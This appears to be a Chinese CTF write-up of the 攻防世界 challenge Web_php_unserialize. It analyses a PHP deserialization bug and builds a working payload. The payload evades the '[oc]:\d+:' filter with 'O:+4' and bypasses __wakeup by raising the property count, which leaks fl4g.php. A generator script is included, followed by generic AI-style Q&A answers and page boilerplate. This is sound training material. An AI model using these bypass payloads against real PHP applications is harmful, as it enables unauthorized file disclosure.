攻防世界之Web_php_unserialize(web进阶)

题目:Web_php_unserialize

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

下面开始分析代码:

知识点:

 1、构造函数  
 	__construct();//当对象被创建时,将会自动调用对象中的construct()函数。
 2、析构函数
 	__destruct();//当对象被销毁时,将会自动调用对象中的construct()函数。
 3、魔术方法(之一)
 	__wakeup();//当进行反序列化时将自动调用这个函数。
 4、序列化对于不同类型得到的字符串格式为
 	string		s:size:value
 	int			i:value
 	bool		b:value;(保存为1或者0null		N
 	array		a:size:{key definition;value definition;(repeated per element)}
 	object		O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

具体分析:

class Demo { 									//定义对象
    private $file = 'index.php';				//定义私有变量$file
    public function __construct($file) { 		//定义构造函数,将会在对象创建是被调用,用于初始化变量$file
        $this->file = $file; 
    }
    function __destruct() { 					//定义析构函数,将会在对象销毁是被调用。用于高亮显示$file所指向的页面的代码
        echo @highlight_file($this->file, true); 	
    }
    function __wakeup() { 						//魔术方法,当对象被反序列化时调用,用于将$file变量的值统一为“index.php”
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 						//判断是否有通过get方法传入的参数var,若有进入下一行,没有则跳转else。
    $var = base64_decode($_GET['var']); 		//将传入的参数var进行base64解码。
    if (preg_match('/[oc]:\d+:/i', $var)) { 	//进行正交匹配,如果是以o或者c开头,后接“:”和一个以上的数字,则匹配成功,结束函数。
        die('stop hacking!'); 
    } else {
        @unserialize($var); 					//反序列化变量,并隐藏可能出现的报错。
    } 
} else { 
    highlight_file("index.php"); 				//高亮显示index.php界面。
} 

所以,我们现在目标是将flag作为参数var的值通过get传入。
因为var一开始会进行base64解码,所以我们需要在最后阶段对var进行base64加密。
因为var接下来会进行正交匹配,匹配成功则结束函数,所以我们需要绕过这个匹配。
因为var接下来会进行一次反序列化,所以我们传入的应该是序列化后的内容,又因为,反序列化时会调用__wakeup()函数将传入参数改变,所以我们要绕过 __wakeup() 函数。
所以有:

class Demo { 
    private $file = 'fl4g.php';
}
echo serialize(new Demo);	//序列化输出对象。

得到:
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

为了绕过 __wakeup()函数,所以我们可以将object size改的大一点以此来绕过该函数。

例如:O:4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

为了绕过正交匹配,我们可以修改strlen,

例如:O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

为了应对解码,我们需要加密

base64_encode('O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}');

上传参数:
在这里插入图片描述
注意!这里有个小细节:私有类型在进行序列化后,会在变量名前后加上一个不可见的字符。
例:

class Demo1{
	private $file = 'fl4g.php';
}
class Demo2{
	public $file = 'fl4g.php';
}
echo(serialize(new demo1));echo("<br>");
echo(serialize(new demo2));echo("<br>");
var_dump(unserialize('O:5:"Demo1":1:{s:11:"Demo1file";s:8:"fl4g.php";}'));echo("<br>");
var_dump(unserialize('O:5:"Demo2":1:{s:4:"file";s:8:"fl4g.php";}'));echo("<br>");
echo(base64_encode(serialize(new demo1)));

在这里插入图片描述

在这里插入图片描述
所以这一题最好使用代码完成替换工作。代码如下:

<?php
class Demo{
	private $file = 'fl4g.php';
}
$a=serialize(new Demo);
$a = str_replace('1:', '2:',$a);
$a = str_replace(':4:', ':+4:',$a);
echo(base64_encode($a));
echo("<br>");

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值